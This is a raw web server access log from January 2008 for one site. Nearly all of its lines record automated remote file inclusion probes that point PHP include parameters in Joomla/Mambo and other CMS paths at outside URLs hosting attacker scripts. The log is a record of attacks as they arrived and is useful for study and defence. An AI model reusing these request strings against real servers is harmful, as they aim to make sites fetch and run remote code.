168.243.203.247 - - [14/Jan/2008:11:36:28 -0800] "GET /logs/access_071210.log/default.php?page=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
168.243.203.247 - - [14/Jan/2008:11:36:28 -0800] "GET /default.php?page=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
168.243.203.247 - - [14/Jan/2008:11:36:28 -0800] "GET /logs/default.php?page=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.8.75 - - [14/Jan/2008:11:36:38 -0800] "GET /logs/access_070723.log HTTP/1.0" 200 1179648 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:11:37:18 -0800] "GET ///////index.php?arquivo=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.134.134.229 - - [14/Jan/2008:11:38:46 -0800] "GET /logs/access_071210.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.appleman.com.tw/pub/image/site/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.134.134.229 - - [14/Jan/2008:11:38:49 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.appleman.com.tw/pub/image/site/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.134.134.229 - - [14/Jan/2008:11:38:57 -0800] "GET /logs/access_071119.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.appleman.com.tw/pub/image/site/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.2.45.165 - - [14/Jan/2008:11:38:58 -0800] "GET /impex/ImpExData.php?systempath=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:39:09 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
200.80.35.36 - - [14/Jan/2008:11:39:15 -0800] "GET /template.php?pagina=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:39:25 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:39:43 -0800] "GET /logs/index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:39:45 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:39:45 -0800] "GET /index2.php?x=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:11:40:13 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:11:40:13 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:11:40:15 -0800] "GET /logs/access_070806.log//include/main.php?config[search_disp]=true&include_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:11:40:16 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:11:40:16 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.3.34 - - [14/Jan/2008:11:40:43 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.3.34 - - [14/Jan/2008:11:40:43 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.3.34 - - [14/Jan/2008:11:40:43 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.251.180 - - [14/Jan/2008:11:40:54 -0800] "GET /logs/index2.php?content=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.251.180 - - [14/Jan/2008:11:40:55 -0800] "GET /index2.php?content=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:41:17 -0800] "GET /logs/access_071210.log/index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:41:17 -0800] "GET /index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:41:18 -0800] "GET /logs/index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:11:41:33 -0800] "GET /logs/access_071015.log/index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:41:37 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
80.84.66.3 - - [14/Jan/2008:11:41:46 -0800] "GET //login.php?dir=http://theseoguide.com/administrator/templates/mambo_admin/css/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:11:41:51 -0800] "GET ///////index.php?arquivo=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.3.34 - - [14/Jan/2008:11:42:15 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:43:00 -0800] "GET /logs/access_070723.log/middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:43:03 -0800] "GET /middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:11:43:07 -0800] "GET /logs/middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.74.171.125 - - [14/Jan/2008:11:43:29 -0800] "GET /logs/access_071022.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.74.171.125 - - [14/Jan/2008:11:43:30 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.74.171.125 - - [14/Jan/2008:11:43:30 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:11:43:36 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:11:43:37 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.52.216.28 - - [14/Jan/2008:11:43:47 -0800] "GET //login.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:43:51 -0800] "GET /logs/access_071022.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:43:51 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:43:51 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:44:17 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
200.80.35.36 - - [14/Jan/2008:11:44:28 -0800] "GET /logs/access_071119.log/template.php?pagina=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.80.35.36 - - [14/Jan/2008:11:44:28 -0800] "GET /logs/template.php?pagina=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.80.35.36 - - [14/Jan/2008:11:44:42 -0800] "GET /logs/access_071231.log/template.php?pagina=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.153.16.5 - - [14/Jan/2008:11:44:49 -0800] "GET /?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:45:13 -0800] "GET //main.php?sayfa=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:45:15 -0800] "GET /logs//main.php?sayfa=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:45:33 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:45:33 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:45:33 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:45:35 -0800] "GET //mcf.php?content=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:45:37 -0800] "GET /logs//mcf.php?content=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:45:41 -0800] "GET /logs/access_071015.log/index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:45:41 -0800] "GET /index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:45:42 -0800] "GET /logs/index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.74.171.125 - - [14/Jan/2008:11:45:48 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:45:49 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:01 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:01 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:01 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:46:01 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:46:01 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:46:01 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:05 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:05 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:05 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:43 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:43 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:43 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:45 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:45 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:46:45 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:47:12 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [14/Jan/2008:11:47:29 -0800] "GET /logs/access_071231.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.74.171.125 - - [14/Jan/2008:11:47:47 -0800] "GET /logs/access_071028.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:47:47 -0800] "GET /logs/access_071028.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:11:47:51 -0800] "GET /logs/access_071210.log/index.php?arquivo=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.254.58.42 - - [14/Jan/2008:11:47:57 -0800] "GET /logs/access_071217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:47:57 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.254.58.42 - - [14/Jan/2008:11:47:57 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.254.58.42 - - [14/Jan/2008:11:47:58 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:48:02 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:11:48:05 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:11:48:05 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:48:06 -0800] "GET /logs/access_071231.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [14/Jan/2008:11:48:06 -0800] "GET /logs/access_071231.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:48:08 -0800] "GET /logs/access_071028.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:48:08 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:48:08 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:11:49:43 -0800] "GET /logs/access.log//modules/Forums/groupcp.php?phpbb_root_path=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:11:49:43 -0800] "GET //modules/Forums/groupcp.php?phpbb_root_path=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:11:49:43 -0800] "GET /logs//modules/Forums/groupcp.php?phpbb_root_path=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.210.91.2 - - [14/Jan/2008:11:50:05 -0800] "GET /logs/access_071015.log/index.php?open=http://miepicardenas.org/administrator/components/com_mp3player/mp3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.91.2 - - [14/Jan/2008:11:50:05 -0800] "GET /logs/index.php?open=http://miepicardenas.org/administrator/components/com_mp3player/mp3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.91.2 - - [14/Jan/2008:11:51:52 -0800] "GET /logs/access_070806.log/index.php?open=http://miepicardenas.org/administrator/components/com_mp3player/mp3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.70.232.156 - - [14/Jan/2008:11:52:30 -0800] "GET /logs/access_071224.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nettogolf.se/nettogolf/filer/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:11:53:03 -0800] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:11:53:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:11:53:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:54:11 -0800] "GET /logs//login.php?dir=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
62.193.248.95 - - [14/Jan/2008:11:54:11 -0800] "GET //login.php?dir=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
